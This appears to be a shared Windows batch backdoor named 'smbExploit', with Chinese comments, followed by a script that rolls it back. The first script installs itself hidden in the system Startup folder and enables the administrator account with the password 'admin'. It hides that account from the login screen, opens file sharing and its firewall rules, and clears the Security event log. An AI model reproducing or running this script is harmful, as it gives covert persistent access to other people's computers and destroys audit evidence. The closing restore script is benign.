脚本功能
实现开机自动启用主机文件共享服务,并启用管理员账户,开启防火墙文件共享配置,并为管理员账户和脚本文件做了隐藏,以及日志清除。
第二段脚本用于恢复操作。回显还原进程的信息交互。
@echo off&color 0A
rem call smbExploitRelieve.bat
rem change code page into utf-8
chcp 65001 >nul 2>nul
rem change command directory into the dir where the current script in
cd /d %~dp0 >nul 2>nul
cd
rem copy to startmenu of user
rem copy smbExploit.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" >nul 2>nul
rem copy to startmenu of system
copy smbExploit.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" >nul 2>nul
rem modify file attribute
rem attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smbExploit.bat" >nul 2>nul
rem system startmenu
attrib +S +H "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" >nul 2>nul
rem active administrator
net user administrator admin /active:yes >nul 2>nul
rem add reg to hide administrator account on system login window
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList" /v administrator /t REG_DWORD /d 0 >nul 2>nul
rem modify ACL of file
rem echo Y|cacls "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smbExploit.bat" /G administrator:F >nul 2>nul
rem system directory
echo Y|cacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" /G administrator:F >nul 2>nul
rem start net share service
net start FDResPub >nul 2>nul
rem enable firewall config about files share
netsh advfirewall firewall set rule group="文件和打印机共享" new enable=yes >nul 2>nul
rem clear log
wevtutil cl security >nul 2>nul
@echo off&color 0A
echo ------modifing ACL
rem echo Y|cacls "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" /G everyone:F 1>nul
echo Y|cacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" /G everyone:F 1>nul 2>>%userprofile%\errInfo.txt
rem 成功处理返回0
rem 找不到文件返回2
echo ------modifing file attributes
rem attrib -S -H "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" 1>nul
attrib -S -H "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" 1>nul
rem 成功处理返回0
rem 找不到文件返回0
echo ------baning administrator account
net user administrator /active:NO 1>nul 2>>%userprofile%\errInfo.txt
rem 拒绝访问放回2
rem 命令成功返回0
echo ------deleting correlative reg object
echo yes|reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList" /v administrator 1>nul 2>>%userprofile%\errInfo.txt
rem 操作成功返回0
rem 拒绝访问返回1
rem 找不到表项返回1
echo ------deleting exp
rem del "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" 1>nul
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" 1>nul
rem errorlevel = 0
rem 找不到文件返回0
rem 执行成功返回0
rem stop service
net stop fdrespub 1>nul 2>>%userprofile%\errInfo.txt
rem 服务未启动返回2
rem 执行成功返回0
rem reset firewall rules
netsh advfirewall firewall set rule group="文件和打印机共享" new enable=no 1>nul 2>>%userprofile%\errInfo.txt
rem 权限不足返回1
rem 成功更新规则返回0
for %%a in ("%userprofile%\errInfo.txt") do (
if "%%~za" equ "0" (
rem 如果没有完全回滚侧回显下述消息
echo :::::::::::::::::::::::::::::::::::::::::::::::
echo smbExploit deleted,and rollbacked the operation of exp,have a good day!
) else (
echo :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
echo :::::::::::::here is the correlative error:::::::::::::::::::::
echo :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
type %userprofile%\errInfo.txt
rem 否则检查相关信息
)
)
choice /C YN /T 5 /M "是否继续检查相关信息?" /D Y
if errorlevel 2 (
del %userprofile%\errInfo.txt
exit)
if errorlevel 1 (
echo ::::::::::::::::::::start information check::::::::::::::::::::::::::::::::
echo ------check administrator account
net user administrator
echo ------check correlative reg object
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts"
echo ------check the state of net share service
sc query FDResPub|find /I "state"
echo ------check firewall rules
netsh advfirewall firewall show rule name="文件和打印机共享(回显请求 - ICMPv4-In)" verbose
echo ------check exp file
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" /A|find "smbExploit.bat"
rem dir "%userprofile%\Start Menu\Programs\Startup" /A|find "smbExploit.bat"
)
del %userprofile%\errInfo.txt
pause